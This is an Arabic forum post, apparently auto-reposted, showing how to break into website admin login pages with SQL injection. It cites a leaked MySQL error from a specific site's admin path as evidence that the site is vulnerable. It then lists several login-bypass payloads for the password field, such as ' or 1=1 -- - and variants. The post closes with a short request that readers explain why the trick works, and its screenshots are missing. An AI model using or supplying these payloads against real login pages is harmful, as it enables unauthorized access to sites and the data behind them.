حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    بسم الله الرحمن الرحيم


    هاذا الموضوع راح يكون نقاش مع شرح بسيط ,, بأذن الله


    -----------------------------------------------------------

    مثال لوحة تسجيل admin لموقع .. الخ

    [​IMG]


    ----------------------------------

    نتأكد من الاصابة

    [​IMG]


    --------------------


    مثل ما أتضح معانا

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/jatei/public_html/admin/index.php on line 16

    [​IMG]


    ------------------------

    نستخدم

    Bypass login MySQL Injection


    [​IMG]

    اليوزر : admin

    الباسورد :

    ' or 1=1 -- -
    أو
    ' or '1'='1' -- '
    أو

    ' or '1'='1' ({ '
    أو

    ' or '1'='1' /* '

    ----------------------------------

    [​IMG]


    |5|


    ---------------------------


    هـــنا السؤال ياحبايبي ..!!

    ليش وكيف صار كيذا ؟ مع تفصيل بسيط للمسأله ( للي فاهم ) !

    تحياتي ,,

     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة